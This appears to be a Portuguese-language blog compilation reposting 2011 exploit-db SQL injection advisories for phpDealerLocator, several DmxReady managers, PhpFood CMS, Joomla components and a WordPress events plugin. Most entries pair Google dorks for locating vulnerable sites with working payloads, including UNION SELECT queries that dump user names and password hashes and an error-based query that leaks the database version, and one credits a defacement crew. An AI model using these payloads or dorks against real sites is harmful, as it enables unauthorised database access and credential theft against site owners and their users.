Tag: injection

phpDealerLocator Multiple SQL Injection Vulnerabilities

por little_oak

# Exploit Title: phpDealerLocator - Multiple SQL Injection vulnerabilities
# Date: 7/3/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: phpdealerlocator.yourphppro.com
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:

record.php?Dealer_ID=
record_country.php?Dealer_ID=
results_latlong.php?s_Latitude=
results_latlong.php?s_Longitude=
results_latlong.php?s_Dealer_Radius=
results_phone.php?s_Dealer_Radius=
results_radius.php?s_Dealer_Radius=

##############################################################
PoC:

http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--

##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew

Fonte: http://www.exploit-db.com/exploits/17477/

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

por little_oak

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady Faqs Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_faqsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=faqs-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

———————————————————————————————————
Bug;

http://target/path/admin/FaqsManager/update.asp?ItemID=xx [ SQL ATTACK]

DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Exploit Title:DmxReady Contact Us Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_contactusmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=contact-us-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/CatalogManager/update.asp?ItemID=xx[SQL ATTACK]

DMXReady Registration Manager v1.2 SQL Injection Vulneratbility

# Exploit Title: DMXReady Registration Manager v1.2 SQL Injection
Vulneratbility
# Google Dork: inurl:inc_registrationmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=registration-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-

Bug;

http://target/path/admin/RegistrationManager/update.asp?MemberID=xx [ SQL

# Exploit Title: DmxReady Catalog Manager v1.2 SQL Injection Vulneratbility
# Google Dork: inurl:inc_catalogmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=catalog-manager-v1
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/CatalogManager/inc_catalogmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————————————-
Bug details;

http://localhost/path//inc_catalogmanager.asp?gpcid=2&cid=4&scid=21&ItemID=[SQLATTACK]

DmxReady News Manager v1.2 SQL Injection Vulnerability

# Exploit Title: DmxReady News Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_newsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=news-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members….

————————————————————————————————-
Bug ;

http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK]

Fontes: http://www.exploit-db.com/exploits/17480/
http://www.exploit-db.com/exploits/17479/
http://www.exploit-db.com/exploits/17478/
http://www.exploit-db.com/exploits/17475/
http://www.exploit-db.com/exploits/17475/

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

por little_oak

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_documentlibrarymanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=document-library-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....

----------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17482/

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

por little_oak

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection
Vulnerability
# Google Dork: inurl:inc_billboardmanager_summary_popup.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link:
http://www.dmxready.com/?product=account-list-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
#Demo :
http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
---------------------------------------------------------------------------------------------------
Bug;

http://target/path/admin/AccountListManager/update.asp?AccountID=xx [ SQL ATTACK]

Fonte: http://www.exploit-db.com/exploits/17483/

PhpFood CMS v2.00 SQL Injection Vulnerability

por little_oak

#############################################################################################################
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##
## Author : kaMtiEz ([email protected]) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 3 July, 2011 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

[ See It ]

Duplicate entry '5.0.91-community1' for key 1 :D

[ FIX ]

dunno :">

#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D

[ NOTE ]

[+] Stop Dreaming , Lets Do it !
[+] Jangan Takut , Luka Pasti Akan Sembuh :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Fonte: http://www.exploit-db.com/exploits/17485/

Joomla Component (com_team) SQL Injection Vulnerability

por little_oak

********************************************************************************
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************

Author : CoBRa_21

Dork : inurl:com_team

********************************************************************************
Exploit

http://localhost/[PATH]/print.php?task=person&id=36 and 1=1

http://localhost/[PATH]/print.php?task=person&id=36 and 1=2

http://localhost/[PATH]/print.php?task=person&id=36 [SQL]

********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
********************************************************************************

Fonte: http://www.exploit-db.com/exploits/17412/

WordPress Events Manager Extended Plugin SQL Injection Vulnerability

por little_oak

------------------------------------------------------------------------

# WordPress Events Manager Extended Plugin Persistent SQL Vulnerability
------------------------------------------------------------------------
# SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/
# Version     : 3.1.2
# Author      : LoocK3D
# Date        : 11 June , 2011
------------------------------------------------------------------------
[-] Dork            ; inurl:wp-admin/admin.php?page=
[-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL]
[-] Exploit         ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+db_unx_users--
------------------------------------------------------------------------
# UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~
# Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew
# UAHCrew        : [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>
# LoocK3D        : [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */

</script>

 

Fonte: http://www.exploit-db.com/exploits/17386/

Joomla Component com_joomnik SQL Injection Vulnerability

por little_oak

 

<------------------- header data start ------------------- >

#############################################################
Joomla Component Joomnik Gallery SQL Injection Vulnerability
#############################################################
# Author : SOLVER ~ Bug Researchers
# Date : 26.05.2011
# Greetz : DreamPower - CWKOMANDO - Toprak - Equ - Err0r - 10line
# Name : Joomla com_joomnik
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Example Vuln :
[+]/index.php?option=com_joomnik&album=[EXPLOIT]
[+] Dork:"com_joomnik"
[+] Demo: http://site.com/index.php?option=com_joomnik&album=6'
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################

http://joomlacode.org/gf/project/joomnik/